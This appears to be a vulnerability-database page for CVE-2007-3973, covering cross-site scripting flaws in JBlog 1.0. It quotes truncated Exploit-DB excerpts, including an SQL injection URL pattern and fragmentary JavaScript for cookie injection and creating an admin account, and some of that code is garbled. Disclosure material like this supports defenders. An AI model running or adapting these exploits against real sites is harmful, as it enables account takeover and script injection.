CVE-2007-3973
published 2007-07-25CVE-2007-3973: Multiple cross-site scripting (XSS) vulnerabilities in JBlog 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter to (a)…
PriorityP424medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
2.77%
84.5th percentile
Multiple cross-site scripting (XSS) vulnerabilities in JBlog 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter to (a) index.php, or the (2) search parameter or (3) theme cookie to (b) recherche.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| jblog | jblog | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
JBlog 1.0 - 'index.php?id' SQL Injection
exploitdb·2007-09-14
CVE-2007-4919 JBlog 1.0 - 'index.php?id' SQL Injection
JBlog 1.0 - 'index.php?id' SQL Injection
---
##################################################
# Script....................................: JBlog ver 1.0
# Script Site...........................: http://www.jmuller.net/jblog/index.php
# Vulnerability........................: Remote SQL injection Exploit
# Access..................................: Remote
# level......................................: Dangerous
# Author..................................: S4mi
# Contact.................................: S4mi[at]LinuxMail.org
##################################################
#Special Greetz to : Simo64, DrackaNz, Coder212, Iss4m, HarDose, r0_0t, ddx39 .....
#
##################################################
#Vuln :
#http://127.0.0.1/jblog/index.php?id=[SQL]
#http://127.0.0.1/jblog/admin
Exploit-DB
JBlog 1.0 - Create / Delete Admin Authentication Bypass
exploitdb·2007-07-21
CVE-2007-4919 JBlog 1.0 - Create / Delete Admin Authentication Bypass
JBlog 1.0 - Create / Delete Admin Authentication Bypass
---
[xss Here]&pcomm=com
cookies Manipulation:
The POST variable 'search' in /jblog/recherche.php also The Cookie variable 'theme' is affected and can be set to :
also we can do this :
'>
or :
'>
This is a small exemple of Inject Cookie Xploit (Cookie Manipulation)
Inject Cookie Xploit By S4mi
function JBlogxpl()
{
document.xploit.action=document.xploit.victim.value;
document.xploit.submit();
}
document.location="javascript: JBlogxpl()"
Remote Privilege Escalation "Creat New Admin Xploit" By S4mi :
-->
JBlog 1.0 -- Remote Privilege Escalation (Creat admin sploit) -- By S4mi
function JBlogxpl() {
if (document.xploit.victim.value=="") {
alert("Please enter target!");
return false;
}
{
xploit.action="http://"+docum
No writeups or analysis indexed.
http://osvdb.org/38557http://osvdb.org/38558http://secunia.com/advisories/26165http://securityreason.com/securityalert/2919http://www.securityfocus.com/archive/1/474320/100/0/threadedhttp://www.securityfocus.com/bid/24991http://www.vupen.com/english/advisories/2007/2611https://exchange.xforce.ibmcloud.com/vulnerabilities/35551https://exchange.xforce.ibmcloud.com/vulnerabilities/35556https://www.exploit-db.com/exploits/4211http://osvdb.org/38557http://osvdb.org/38558http://secunia.com/advisories/26165http://securityreason.com/securityalert/2919http://www.securityfocus.com/archive/1/474320/100/0/threadedhttp://www.securityfocus.com/bid/24991http://www.vupen.com/english/advisories/2007/2611https://exchange.xforce.ibmcloud.com/vulnerabilities/35551https://exchange.xforce.ibmcloud.com/vulnerabilities/35556https://www.exploit-db.com/exploits/4211
2007-07-25
Published